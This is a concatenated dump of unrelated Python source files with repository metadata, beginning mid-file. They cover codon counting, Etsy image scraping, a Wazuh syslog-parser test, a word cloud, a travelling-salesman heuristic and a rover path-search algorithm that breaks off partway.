\"Lys\",\n \"AGT\": \"Ser\", \"AGC\": \"Ser\", \"AGA\": \"Arg\", \"AGG\": \"Agr\",\n \"GTT\": \"Val\", \"GTC\": \"Val\", \"GTA\": \"Val\", \"GTG\": \"Val\",\n \"GCT\": \"Ala\", \"GCC\": \"Ala\", \"GCA\": \"Ala\", \"GCG\": \"Ala\",\n \"GAT\": \"Asp\", \"GAC\": \"Asp\", \"GAA\": \"Glu\", \"GAG\": \"Glu\",\n \"GGT\": \"Gly\", \"GGC\": \"Gly\", \"GGA\": \"Gly\", \"GGG\": \"Gly\"\n}\n\n\ndef count_codons(fasta_file, csv_file):\n '''\n Purpose:\n Count how many times each 3-character codon appears in the given file\n Parameter(s):\n fasta_file - The given file being read from\n csv_file - The file to be written to\n Return Value:\n A dictionary representing the codons and their corresponding counts\n '''\n LOGGER.info(f'Counting codons in {fasta_file}')\n codon_counts = {} # Initialize codon counter\n\n with open(fasta_file) as f: # Open input file\n for line in f: # Read sequences\n line = line.rstrip()\n if line.startswith('>'): # Lines that start with '>' are header lines that contain metadata about the sequence.\n continue\n if (len(line)-2) % 3 != 0: # Accounts for lines with length not evenly divisible by 3\n line = line[:len(line)-1]\n for i in range(0, len(line)-2, 3): # Iterate over sequence by codons\n codon = line[i:i+3]\n if codon in codon_counts: # Update codon count\n codon_counts[codon] += 1\n else:\n codon_counts[codon] = 1\n\n with open(csv_file, 'w') as f: # Write counts to output CSV file\n f.write(\"Codon,Count\\n\") # Write the header\n for codon, count in codon_counts.items():\n f.write(f\"{codon},{count}\\n\") # Write codon and count\n \n LOGGER.info(f'Finished counting, saving results to {csv_file}')\n \n return codon_counts\n\n\ndef convert_to_amino(codon_counts, output_csv_file):\n '''\n Purpose:\n Convert codon counts to amino acid counts and save them to a CSV file.\n Parameters:\n codon_counts - dictionary containing codon counts\n output_csv_file - file to save the amino acid counts in CSV format\n Return Value:\n None\n '''\n LOGGER.info(f'Counting amino acid in Codon Counts Dictionary')\n amino_acid_counts = {}\n \n for codon, count in codon_counts.items():\n amino_acid = CODON_TO_AMINO_TABLE.get(codon, \"Unknown\") # Retrieves codon value from conversion table; Returns \"Unknown\" if not found\n amino_acid_counts[amino_acid] = amino_acid_counts.get(amino_acid, 0) + count # Updates dictionary with the count of the amino acid.\n \n amino_acid_counts_df = pd.DataFrame(list(amino_acid_counts.items()), columns=[\"Amino Acid\", \"Count\"]) # Create a DataFrame from the amino acid counts\n \n amino_acid_counts_df.to_csv(output_csv_file, index=False) # Save the amino acid counts to a CSV file\n \n LOGGER.info(f'Saved amino acid counts to {output_csv_file}')\n\n\ndef plot_codons(gene_codons_csv, genome_codons_csv, output_png_file):\n '''\n Purpose:\n Generate a barplot comparing side-by-side the counts of each codon in the two different files\n Parameter(s):\n gene_codons_csv - input codon counts csv file for separate genes\n genome_codons_csv - input codon counts csv file for whole genome\n output_png_file - output png file for barplot\n Return Value:\n None\n '''\n # DataFrame of codon counts for separate genes and whole genome\n gene_codons_csv = pd.read_csv(gene_codons_csv)\n genome_codons_csv = pd.read_csv(genome_codons_csv) \n \n LOGGER.info(f'Loading CSV files: {gene_codons_csv}, {genome_codons_csv}')\n \n # Sort gene counts and genome counts in descending order by 'Count' column\n gene_codons_csv = gene_codons_csv.sort_values('Count', ascending=False)\n genome_codons_csv = genome_codons_csv.sort_values('Count', ascending=False)\n \n fig, ax = plt.subplots(figsize=(12, 6))\n \n # Adds a label for this set of bars, and Plots a bar chart using the 'Codon' column as x value and 'Frequency' as height.\n ax.bar(gene_codons_csv['Codon'], gene_codons_csv['Count'], label='Coding Sequences (correct frame shift)')\n ax.bar(genome_codons_csv['Codon'], genome_codons_csv['Count'], label='Whole Genome (random frame shift)')\n ax.set_xlabel('Codon')\n ax.set_ylabel('Frequency')\n ax.set_title('Codon Counts')\n ax.legend()\n \n # Rotate x-axis labels for better readability\n plt.xticks(rotation=90)\n \n # Automatically adjusts subplot parameters for better spacing, and saves the figure to provided file path\n plt.tight_layout()\n plt.savefig(output_png_file)\n plt.close()\n \n # Save progress to logger file\n LOGGER.info(f'Saved plot to {output_png_file}')\n \ndef plot_amino_acid(gene_amino_acid_csv, genome_amino_acid_csv, output_png_file):\n '''\n Purpose:\n Generate a barplot comparing side-by-side the counts of each amino acid in the two different files\n Parameter(s):\n gene_amino_csv_file - CSV file containing amino acid counts for separate genes\n genome_amino_csv_file - CSV file containing amino acid counts for the whole genome\n output_png_file - output png file for barplot\n Return Value\n None\n '''\n gene_amino_acid_csv = pd.read_csv(gene_amino_acid_csv)\n genome_amino_acid_csv = pd.read_csv(genome_amino_acid_csv)\n \n LOGGER.info(f'Loading CSV files: {gene_amino_acid_csv}, {genome_amino_acid_csv}')\n \n gene_amino_acid_csv = gene_amino_acid_csv.sort_values('Count', ascending=False)\n genome_amino_acid_csv = genome_amino_acid_csv.sort_values('Count', ascending=False)\n \n fig, ax = plt.subplots(figsize=(12, 6))\n \n ax.bar(gene_amino_acid_csv['Amino Acid'], gene_amino_acid_csv['Count'], label='Coding Sequences (correct frame shift)')\n ax.bar(genome_amino_acid_csv['Amino Acid'], genome_amino_acid_csv['Count'], label='Whole Genome (random frame shift)')\n ax.set_xlabel('Amino Acid')\n ax.set_ylabel('Frequency')\n ax.set_title('Amino Acid Counts')\n ax.legend()\n \n plt.xticks(rotation=90)\n \n plt.tight_layout()\n plt.savefig(output_png_file)\n plt.close()\n \n LOGGER.info(f'Saved amino acid plot to {output_png_file}')\n\ndef test():\n '''Test Driver for the program'''\n LOGGER.info('Running the program on a small fake genome file...')\n test_fasta = \"test_genome.fna\"\n test_genome_csv = \"test_genome.csv\"\n test_codon_counts = count_codons(test_fasta, test_genome_csv)\n \n\ndef main():\n '''Run entire program to generate codon and amino acid counts csv files.\n Also generate a barplot for both genome counts and amino acid counts.'''\n \n # Generate gene and genome codon CSVs\n LOGGER.info('Generating CSV files...')\n gene_fasta = \"SARS-CoV-2_separate_genes.fna\"\n gene_csv = \"separate_genes.csv\"\n genome_fasta = \"SARS-CoV-2_whole_genome.fna\"\n genome_csv = \"whole_genome.csv\"\n gene_codons = count_codons(gene_fasta, gene_csv)\n genome_codons = count_codons(genome_fasta, genome_csv)\n \n # Codon plot\n LOGGER.info('Generating codon usage barplot...')\n codon_png = \"codon_counts.png\"\n plot_codons(gene_csv, genome_csv, codon_png)\n \n # Convert codons counts to amino acid counts\n LOGGER.info('Converting codons to amino acid...')\n LOGGER.info('Generating amino acid CSV files...')\n gene_amino_csv = \"gene_amino_counts.csv\"\n genome_amino_csv = \"genome_amino_counts.csv\"\n convert_to_amino(gene_codons, gene_amino_csv)\n convert_to_amino(genome_codons, genome_amino_csv)\n \n # Amino acid plot\n LOGGER.info('Generating amino acid usage barplot...')\n amino_png = \"amino_acids_counts.png\"\n plot_amino_acid(gene_amino_csv, genome_amino_csv, amino_png)\n\n \nif __name__ == '__main__':\n try:\n if len(sys.argv) == 3:\n # Codon CSV generation\n LOGGER.info('Generating Codon counts CSV file...')\n count_codons = count_codons(sys.argv[1], sys.argv[2])\n else:\n LOGGER.info('Running the entire program...')\n # test()\n main()\n except Exception as e:\n LOGGER.exception('Error running program')\n \n ","repo_name":"curtiskokuloku/CodonCountingVisualization","sub_path":"count_codons.py","file_name":"count_codons.py","file_ext":"py","file_size_in_byte":10063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2522975697","text":"import os\r\nfrom time import sleep\r\nfrom clicknium import clicknium as cc, locator, ui\r\nimport requests\r\n\r\nsearch_key_word = 'mobile phone bag'\r\n\r\ndef main():\r\n # open the website\r\n tab = cc.chrome.open(\"https://www.etsy.com/sg-en/?ref=lgo\")\r\n\r\n # input search keyword,and click the search button\r\n tab.find_element(locator.etsy.txt_search).set_text(search_key_word)\r\n tab.find_element(locator.etsy.btn_search).click()\r\n\r\n # wait 4 second to loading content\r\n sleep(4)\r\n\r\n # set sort by \r\n tab.find_element(locator.etsy.btn_dropdown).click()\r\n tab.find_element(locator.etsy.dropdown_item_most_recent).click()\r\n sleep(4)\r\n\r\n # try get the top 5 pages \r\n for page_count in range(0,5):\r\n similar_elements_img = tab.find_elements(locator.etsy.similar_img)\r\n print(f'page_count:{page_count}, similar_elements_img length:{len(similar_elements_img)}')\r\n\r\n index = 0\r\n for img in similar_elements_img:\r\n download_img(img,index)\r\n index+=1\r\n disabled = tab.find_element(locator.etsy.btn_next_page).get_property('disabled')\r\n if(disabled == 'true'):\r\n break\r\n else:\r\n tab.find_element(locator.etsy.btn_next_page).click()\r\n sleep(4)\r\n sleep(3)\r\n tab.close()\r\n \r\n\r\ndef download_img(img_obj,index):\r\n \r\n img_src = img_obj.get_property('src')\r\n print(f'index:{index},start download: {img_src}...')\r\n \r\n # img = requests.get(img_src, \r\n # proxies=dict(http='socks5://127.0.0.1:10808',\r\n # https='socks5://127.0.0.1:10808'))\r\n\r\n img = requests.get(img_src)\r\n\r\n filepath = './download/'+img_src.split('/')[-1]\r\n i = 1\r\n while(os.path.exists(filepath)):\r\n filepath = f'./download/{img_src.split(\"/\")[-1].split(\".\")[0]}-{i}.jpg'\r\n i+=1\r\n with open(filepath,'wb') as f:\r\n f.write(img.content)\r\n print(f'index:{index},download success!')\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"automation9417/etsy","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18382543021","text":"import os\nimport re\nimport pytest\nfrom time import sleep\n\nfrom wazuh_testing import ARCHIVES_JSON_PATH\nfrom wazuh_testing.tools import file\nfrom wazuh_testing.tools.configuration import load_configuration_template, get_test_cases_data\nfrom wazuh_testing.tools.run_simulator import syslog_simulator\nfrom wazuh_testing.tools.thread_executor import ThreadExecutor\n\n\npytestmark = [pytest.mark.tier(level=0)]\n\n# Reference paths\nTEST_DATA_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')\nCONFIGURATIONS_PATH = os.path.join(TEST_DATA_PATH, 'configuration_template')\nTEST_CASES_PATH = os.path.join(TEST_DATA_PATH, 'test_cases')\nSYSLOG_SIMULATOR_START_TIME = 2\n\n# Configuration and cases data\nt1_configurations_path = os.path.join(CONFIGURATIONS_PATH, 'configuration_syslog_message_parser.yaml')\nt1_cases_path = os.path.join(TEST_CASES_PATH, 'cases_syslog_message_parser.yaml')\n\n# Syslog message IPV6 values test configurations (t1)\nt1_configurations_parameters, t1_configurations_metadata, t1_cases_ids = get_test_cases_data(t1_cases_path)\nt1_configurations = load_configuration_template(t1_configurations_path, t1_configurations_parameters,\n t1_configurations_metadata)\n\n\n@pytest.mark.parametrize('configuration, metadata', zip(t1_configurations, t1_configurations_metadata),\n ids=t1_cases_ids)\ndef test_syslog_message_parser(configuration, metadata, set_wazuh_configuration, truncate_event_logs,\n restart_wazuh_daemon_function):\n '''\n description: Check if 'wazuh-remoted' can receive syslog messages through the socket.\n\n test_phases:\n - setup:\n - Apply ossec.conf configuration changes according to the configuration template and use case.\n - Truncate wazuh event logs.\n - Restart wazuh-manager service to apply configuration changes.\n - test:\n - Check that the messages are parsed correctly in the archives.json file.\n - teardown:\n - Truncate wazuh logs.\n - Restore initial configuration, both ossec.conf and local_internal_options.conf.\n\n wazuh_min_version: 4.4.0\n\n parameters:\n - configuration:\n type: dict\n brief: Get configurations from the module.\n - metadata:\n type: dict\n brief: Get metadata from the module.\n - set_wazuh_configuration:\n type: fixture\n brief: Apply changes to the ossec.conf configuration.\n - truncate_event_logs:\n type: fixture\n brief: Truncate wazuh event logs.\n - restart_wazuh_daemon_function:\n type: fixture\n brief: Restart the wazuh service.\n\n assertions:\n - Verify the syslog message is received and parsed correctly.\n\n input_description:\n - The `configuration_syslog_message_parser` file provides the module configuration for this\n test.\n - The `cases_syslog_message_parser` file provides the test cases.\n\n expected_output:\n - fr'\"full_log\":\"{message}\".*\"location\":\"{location}\"'\n '''\n # Set syslog simulator parameters according to the use case data\n syslog_simulator_parameters = {'address': metadata['address'], 'port': metadata['port'],\n 'protocol': metadata['protocol'],\n 'messages_number': metadata['messages_number'],\n 'message': metadata['message']}\n\n # Run syslog simulator thread\n syslog_simulator_thread = ThreadExecutor(syslog_simulator, {'parameters': syslog_simulator_parameters})\n syslog_simulator_thread.start()\n\n # Wait until syslog simulator is started\n sleep(SYSLOG_SIMULATOR_START_TIME)\n\n # Read the events log data\n events_data = file.read_file(ARCHIVES_JSON_PATH).split('\\n')\n\n message = metadata['message']\n location = metadata['address']\n find_msg = (fr'\"full_log\":\"{message}\".*\"location\":\"{location}\"').replace('\"', r'\\\"')\n\n event_msg = [event for event in events_data if bool(re.match(fr\".*{find_msg}.*\", event))]\n\n assert len(event_msg) == metadata['messages_number'], \"The event's format is not the expected one\"\n\n # Wait until syslog simulator ends\n syslog_simulator_thread.join()\n","repo_name":"wazuh/wazuh-qa","sub_path":"tests/integration/test_remoted/test_socket_communication/test_syslog_message_parser.py","file_name":"test_syslog_message_parser.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"21"} +{"seq_id":"10073361674","text":"def square_digits (num) :\n digits = [d for d in str(num)]\n\n i = 0\n for d in digits :\n digits[i] = str(int(d)**2)\n i += 1\n\n digits = \"\".join(digits)\n digits = int(digits)\n return digits\n\n\n\nn = 1234\nprint(square_digits(n))","repo_name":"mmdaz/my_solved_algorithm_problems","sub_path":"old-codes/square_digits.py","file_name":"square_digits.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"3080822340","text":"import jieba# 分词模块\nimport re\nimport collections\nf=open('51job岗位信息.txt','r',encoding='utf-8',errors='ignore')\ntext=f.read()# 读取文件\nf.close()\npattern='[^0-9a-zA-Z\\W_]+'\njob_info=re.findall(pattern,text)# 返回列表\n\nresult=list(jieba.cut(' '.join(job_info)))# 将字符串中的常见词频提取,并返回字符串\n# print(list(result))\nprint(collections.Counter(result))\n\n# 设置词云背景\nimport numpy as np# pip install numpy\nimport PIL.Image as img# pip install PIL\nfrom wordcloud import WordCloud\nmask=np.array(img.open('D:\\\\pycharm\\\\pycharm_dm\\\\a课程资料一阶段\\\\爱心.jpg'))\n# print(mask)\nwordcloud=WordCloud(\n mask=mask,\n width=800,height=600,background_color='white',\n font_path='C:\\\\Windows\\\\Fonts\\\\msyh.ttc',# 如果存在中文字符需要加载解析的词典\n max_font_size=500,min_font_size=20\n).generate(' '.join(result))\nimage=wordcloud.to_image()\n# image.show()# 生成图片展示\nwordcloud.to_file('岗位要求词云图.png')# 在本地生成文件展示\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"steadyrays/usermaster","sub_path":"python/python_base/class30_职位要求分析.py","file_name":"class30_职位要求分析.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73142059893","text":"# Course: CS4306-01\n# Student name: Jonathan Miu\n# Student ID: 000456452\n# Programming Assignment #3\n# Due Date: November 13, 2018\n# Signature: jmiu\n# (The signature means that the program is your own work)\n# Score: ______________\n\n\nimport random\nimport sys\nimport time\nimport os.path\nimport json\n\nfilename = 'export'\nrandom.seed()\n\ndef create_matrix(size) :\n\tglobal matrix\n\tmatrix = []\n\tfor i in range(size) :\n\t\ttemplist = []\n\t\tfor i in range(size) :\n\t\t\ttemplist.append(0)\n\t\tmatrix.append(templist)\n\ndef randomize_matrix(max, chance) :\n\tglobal matrix\n\tfor i in range(len(matrix)) :\n\t\tfor j in range(len(matrix[i])) :\n\t\t\tif i != j and random.random() <= chance :\n\t\t\t\tmatrix[i][j] = random.randint(1, max)\n\t# just trying to make sure the matrix is actually solvable (it might still not be after this, but it helps)\n\tfor i in range(len(matrix)) :\n\t\tsolvable = False\n\t\tfor j in range(len(matrix[i])) :\n\t\t\tif matrix[i][j] > 0 :\n\t\t\t\tsolvable = True\n\t\tif not solvable :\n\t\t\tj = i\n\t\t\twhile j == i :\n\t\t\t\tj = random.randint(0, len(matrix[i]) - 1)\n\t\t\tmatrix[i][j] = random.randint(1, max)\n\ndef print_matrix() :\n\tfor i in range(len(matrix)) :\n\t\tprint(matrix[i])\n\ndef is_int(s):\n try: \n int(s)\n return True\n except ValueError:\n return False\n\ndef is_float(s):\n try: \n float(s)\n return True\n except ValueError:\n return False\n\ndef find_shortest(start) :\n\tglobal matrix\n\tfailures = []\n\tpath = []\n\tcurrent = start\n\t# just give up after this many failures (there seems to be a bug causing it to occasionally run forever that I just *can't* find)\n\tmaxfailures = 10000 #len(matrix) * len(matrix[current])\n\n\twhile len(path) < len(matrix) :\n\t\tshortest = [-1, sys.maxsize]\n\t\tif len(path) + 1 < len(matrix) :\n\t\t\tfor j in range(0, len(matrix[current])) :\n\t\t\t\tif matrix[current][j] > 0 and matrix[current][j] < shortest[1] and j not in path and path + [current, j] not in failures :\n\t\t\t\t\tshortest = [j, matrix[current][j]]\n\t\t\tif (shortest[0]) >= 0 :\n\t\t\t\tpath.append(current)\n\t\t\t\tcurrent = shortest[0] # j\n\t\t\telse : # failure found\n\t\t\t\tfailures.append(path + [current])\n\t\t\t\tif len(path) > 0 :\n\t\t\t\t\tcurrent = path.pop() # reset current\n\t\t\t\telse :\n\t\t\t\t\tcurrent = start\n\t\telse : # make sure that path[-1] can connect to path[0]\n\t\t\tif matrix[path[-1]][path[0]] > 0 : # woohoo, they connect!\n\t\t\t\tpath = path + [current, path[0]]\n\t\t\telse : # failure\n\t\t\t\tfailures.append(path + [current])\n\t\t\t\tif len(path) > 0 :\n\t\t\t\t\tcurrent = path.pop() # reset current\n\t\t\t\t\tif len(path) > 0 :\n\t\t\t\t\t\tcurrent = path.pop() # reset current\n\t\t\t\t\telse :\n\t\t\t\t\t\tcurrent = start\n\t\t\t\telse :\n\t\t\t\t\tcurrent = start\n\t\t# some debug prints, enable the sleep message otherwise it's unreadable\n\t\t#print(\"failures:\", failures)\n\t\t#print(\"path:\", path + [current])\n\t\t#time.sleep(0.1) \n\t\tif path + [current] in failures or len(failures) > maxfailures :\n\t\t\treturn [sys.maxsize, []]\n\n\treturn [walk_path(path), path]\n\ndef save_matrix(filename) :\n\tglobal matrix\n\twith open(filename, 'w') as file :\n\t\tfile.write(json.dumps(matrix))\n\tprint(\"saved as\", filename)\n\ndef load_matrix(filename) :\n\tglobal matrix\n\twith open(filename, 'r') as file :\n\t\tmatrix = json.load(file)\n\ndef validate_answer(path) :\n\tglobal matrix\n\tif len(path) != len(matrix) + 1 or path[0] != path[-1] :\n\t\treturn False\n\tnode = 0\n\twhile node < len(matrix) :\n\t\tif node in path :\n\t\t\tnode = node + 1\n\t\telse :\n\t\t\treturn False\n\treturn True\n\ndef walk_path(path) :\n\tglobal matrix\n\tlength = 0\n\tfor i in range(1, len(path) - 1) :\n\t\tlength = length + matrix[i-1][i]\n\treturn length\n\nmatrix = None\n\nsize = 10\nmaxlen = 100\nchance = 0.5\nif len(sys.argv) > 1 :\n\tif is_int(sys.argv[1]) : size = int(sys.argv[1])\n\telif os.path.isfile(sys.argv[1]) :\n\t\tload_matrix(sys.argv[1])\n\tif len(sys.argv) > 2 and is_int(sys.argv[2]) :\n\t\tmaxlen = int(sys.argv[2])\n\t\tif len(sys.argv) > 3 and is_float(sys.argv[3]) :\n\t\t\tchance = float(sys.argv[3])\nelse :\n\tprint(\"You can specify how the matrix is generated by inputting variables: python tsp.py {matrix size} {max distance} {chance of adding connection (0 to 1)} ex: python tsp.py 100 100 0.5\")\n\tprint(\"or simply pass the filename of a matrix in json format: python tsp.py matrix.json\")\n\nif matrix is None :\n\tcreate_matrix(size)\n\trandomize_matrix(maxlen, chance)\n\nif len(matrix) <= 50 :\n\tprint_matrix()\nelse :\n\tprint(\"not printing matrix because it's too huge and wouldn't be helpful anyway\")\n\nprint(\"finding smallest \", end='', flush=True)\n# print dot every so many calculations\ndots = len(matrix) / 100\nhowmanydots = 1 / dots\nif howmanydots < 1 :\n\thowmanydots = 1\nhowmanydots = int(howmanydots)\nprintdot = 0\nsmallest = [sys.maxsize, []]\nfor i in range(len(matrix)) :\n\tanswer = find_shortest(i)\n\tprintdot = printdot + 1\n\tif printdot >= dots :\n\t\tif len(answer[1]) <= 0 :\n\t\t\tfor j in range(howmanydots) :\n\t\t\t\tprint(\"x\", end='', flush=True)\n\t\telse :\n\t\t\tfor j in range(howmanydots) :\n\t\t\t\tprint(\".\", end='', flush=True)\n\t\tprintdot = 0\n\tif smallest[0] > answer[0] :\n\t\tsmallest = answer\nprint(\" done.\")\nprint(\"Is answer valid (contains every point):\", validate_answer(smallest[1]))\n\nprint(\"distance:\", smallest[0], \"\\npath:\", smallest[1])\n#print(answer[1])\n#print(answer[1][:5])\nfilename = input(\"Save matrix? Enter filename to save, or leave blank to cancel. (recommended to add .json)\\n>\")\nif len(filename) > 0 :\n\tsave_matrix(filename)\nprint(\"done.\")","repo_name":"DanielleMiu/Travelling-Salesman","sub_path":"tsp.py","file_name":"tsp.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6040801497","text":"import os\nimport csv\n\ntotal_votes=0\nwinner_vote=0\nwinner=\"\"\ncandidates=[]\nvote_counter={}\nvote_percentage=[]\nmax_vote=0\n\ncsvpath=os.path.join(\"..\", \"Resources\", \"election_data.csv\")\n\nwith open (csvpath, newline=\"\") as csvfile:\n \n csvreader=csv.reader(csvfile, delimiter=\",\")\n next(csvreader, None)\n \n for row in csvreader:\n candidate=row[2]\n \n if candidate in candidates:\n vote_counter[candidate]+=1\n else:\n candidates.append(candidate)\n vote_counter[candidate]=1\n total_votes+=1\n\nfor i in range(len(candidates)):\n\tvote_share = round((vote_counter[candidates[i]]/total_votes)*100, 3)\n\tvote_percentage.append(vote_share)\n\tif vote_counter[candidates[i]] > max_vote:\n\t\tmax_vote = vote_counter[candidates[i]]\n\t\twinner = candidates[i]\n\nprint(\"Election Results\")\nprint(\"-------------------------------------\")\nprint(f'Total Votes:{total_votes}')\nprint(\"-------------------------------------\")\nfor i in range(len(candidates)):\n\tprint(f'{candidates[i]} : {vote_percentage[i]} % ( {vote_counter[candidates[i]]})')\nprint(\"-------------------------------------\")\nprint(f'Winner: {winner}')\nprint(\"------------------------------------- \")\n\n\noutput= open(\"Election Results.txt\",\"w+\")\noutput.write(\"Election Results \\n\")\noutput.write(\"------------------------------------- \\n\")\noutput.write(f'Total Votes: {total_votes} \\n')\noutput.write(\"------------------------------------- \\n\")\nfor i in range(len(candidates)):\n\toutput.write(f'{(candidates[i])} : {(vote_percentage[i])} % {vote_counter[candidates[i]]} \\n')\noutput.write(\"------------------------------------- \\n\")\noutput.write(f'Winner: {winner}' + \"\\n\")\noutput.write(\"------------------------------------- \\n\")\noutput.close()","repo_name":"akshitarora19/Python-PyBank-PyPoll","sub_path":"main_PyPoll.py","file_name":"main_PyPoll.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23175176310","text":"import os\nfrom Bio import Entrez\nfrom Bio import SeqIO\n\n__location__ = os.path.realpath(\n os.path.join(os.getcwd(), os.path.dirname(__file__)))\n\nfile = open(os.path.join(__location__,\"rosalind_frmt.txt\"), \"r\")\n\ninputStr = file.read().replace(\" \", \", \")\n\nEntrez.email = \"henrique.almeida@unifesp.br\"\nhandle = Entrez.efetch(db=\"nucleotide\", id=[inputStr], rettype=\"fasta\")\nhandleOut = Entrez.efetch(db=\"nucleotide\", id=[inputStr], rettype=\"fasta\")\nrecordsOut = handleOut.read().split(\"\\n\\n\")\nrecords = list(SeqIO.parse(handle, \"fasta\"))\n\nminIdx = 0\n\nfor idx in range(len(records)):\n if(len(records[idx].seq) < len(records[minIdx].seq)):\n minIdx = idx\n\nprint(recordsOut[minIdx])","repo_name":"qedrohenrique/exercises","sub_path":"Rosalind/FRMT.py","file_name":"FRMT.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3476037228","text":"import queue\nimport operator\n\n\"\"\"Consist of x and y co-ordinates of a particular location\"\"\"\n\n\nclass Node:\n\n # constructor\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def __repr__(self):\n return str(self.x) + \",\" + str(self.y)\n\n def __eq__(self, other):\n if other is not None:\n return str(self.x) == str(other.x) and str(self.y) == str(other.y)\n return True\n\n def __ne__(self, other):\n if other is not None:\n return str(self.x) != str(other.x) or str(self.y) != str(other.y)\n return True\n\n def __cmp__(self, other):\n return str(self.x) == str(other.x) and str(self.y) == str(other.y)\n\n def __hash__(self):\n return (hash(self.x)) + (2 * hash(self.y))\n\n # is_valid_location checks if a particular location is within the search space\n def is_valid_location(self, i, j, col, row):\n if 0 <= i < int(col) and 0 <= j < int(row):\n return True\n return False\n\n # returns the cell to the north of the current cell\n def get_north(self, col, row):\n if self.is_valid_location(self.x, self.y - 1, col, row):\n return Node(self.x, self.y - 1)\n return None\n\n # returns the cell to the north east of the current cell\n def get_north_east(self, col, row):\n if self.is_valid_location(self.x + 1, self.y - 1, col, row):\n return Node(self.x + 1, self.y - 1)\n return None\n\n # returns the cell to the north west of the current cell\n def get_north_west(self, col, row):\n if self.is_valid_location(self.x - 1, self.y - 1, col, row):\n return Node(self.x - 1, self.y - 1)\n return None\n\n # returns the cell to the west of the current cell\n def get_west(self, col, row):\n if self.is_valid_location(self.x - 1, self.y, col, row):\n return Node(self.x - 1, self.y)\n return None\n\n # returns the cell to the south west of the current cell\n def get_south_west(self, col, row):\n if self.is_valid_location(self.x - 1, self.y + 1, col, row):\n return Node(self.x - 1, self.y + 1)\n return None\n\n # returns the cell to the south of the current cell\n def get_south(self, col, row):\n if self.is_valid_location(self.x + 1, self.y, col, row):\n return Node(self.x + 1, self.y)\n return None\n\n # returns the cell to the south east of the current cell\n def get_south_east(self, col, row):\n if self.is_valid_location(self.x + 1, self.y + 1, col, row):\n return Node(self.x + 1, self.y + 1)\n return None\n\n # returns the cell to the east of the current cell\n def get_east(self, col, row):\n if self.is_valid_location(self.x, self.y + 1, col, row):\n return Node(self.x, self.y + 1)\n return None\n\n\n\"\"\"Implements the required algorithm and finds the best path from the landing site to the target sites\"\"\"\n\n\nclass Search:\n actions = {\"north\": \"get_north\", \"east\": \"get_east\", \"south\": \"get_south\", \"west\": \"get_west\",\n \"north_east\": \"get_north_east\", \"north_west\": \"get_north_west\", \"south_east\": \"get_south_east\",\n \"south_west\": \"get_south_west\"}\n\n # constructor\n def __init__(self, type_of_search, landing_site, target_sites, state, max_z_elevation, col, row):\n self.type_of_search = type_of_search\n self.landing_site = landing_site\n self.target_sites = target_sites\n self.state = state\n self.max_z_elevation = max_z_elevation\n self.col = col\n self.row = row\n\n def __repr__(self):\n return \"Type of search: \" + str(self.type_of_search) + \" Landing Site: \" + str(\n self.landing_site) + \" Target sites: \" + \\\n str(self.target_sites) + \" Max Z elevation:\" + str(self.max_z_elevation)\n\n # checks if the given site os equal to the target site\n def goal_test(self, curr_site, target_site):\n return curr_site == target_site\n\n # checks if the action is diagonal movement from one cell to the other\n def is_move_diagonal(self, action):\n return action == \"north_east\" or action == \"north_west\" or action == \"south_east\" or action == \"south_west\"\n\n def find_route(self, target_site):\n path = []\n if self.type_of_search == \"BFS\":\n path = self.bfs(target_site)\n if self.type_of_search == \"UCS\":\n path = self.ucs(target_site)\n if self.type_of_search == \"A*\":\n path = self.a_star(target_site)\n return path\n\n # forms the route from landing sie to target site\n def form_route(self, child_parent_dict, target_site):\n # list to store the entire path\n route = []\n present_site = target_site\n # append the site locations to the list as long as the site whose parent is landing site is found\n while present_site != self.landing_site:\n route.append(present_site)\n present_site = child_parent_dict[present_site]\n route.append(self.landing_site)\n # reverse the list\n route = route[::-1]\n return route\n\n # BFS Algorithm\n def bfs(self, target_site):\n # FIFO queue to push the locations of visited cells and pop the one by one\n frontier = queue.deque()\n\n # list to keep a track of all the locations visited\n explored = []\n\n # dictionary to store the parent cell location for each cell location\n child_parent_dict = {}\n\n # check if landing and target site is same\n if self.goal_test(self.landing_site, target_site):\n final_path = self.form_route(None, self.landing_site)\n return final_path\n\n frontier.append(self.landing_site)\n\n while True:\n if not frontier:\n return \"FAIL\"\n current_site = frontier.popleft()\n explored.append(current_site)\n for action in self.actions:\n site = eval(\n \"current_site\" + \".\" + self.actions.get(action) + \"(\" + self.col + \", \" + self.row + \")\")\n\n # check if the rover is allowed to move from the current cell to the child cell\n if site is not None and abs(\n int(self.state[site.y][site.x]) - int(self.state[current_site.y][current_site.x])) <= int(\n self.max_z_elevation):\n if site not in explored and site not in frontier:\n if self.goal_test(site, target_site):\n child_parent_dict[site] = current_site\n final_path = self.form_route(child_parent_dict, site)\n return final_path\n frontier.append(site)\n child_parent_dict[site] = current_site\n\n # UCS Algorithm\n def ucs(self, target_site):\n # dictionary to store the cell location and path cost from landing site\n priority_frontier = {self.landing_site: 0}\n\n # list to keep a track of all the visited cells\n explored = []\n\n # dictionary to store parent location for each cell\n child_parent_dict = {}\n\n # dictionary to maintain all the cell locations with path cost from landing site\n site_path_cost = {self.landing_site: 0}\n\n while True:\n if not priority_frontier:\n return \"FAIL\"\n\n # sort the priority queue by path cost\n sites_sorted_by_path_cost = sorted(priority_frontier.items(), key=operator.itemgetter(1))\n\n # pop the cell location with lowest path cost\n current_site = sites_sorted_by_path_cost[0][0]\n del priority_frontier[current_site]\n\n if 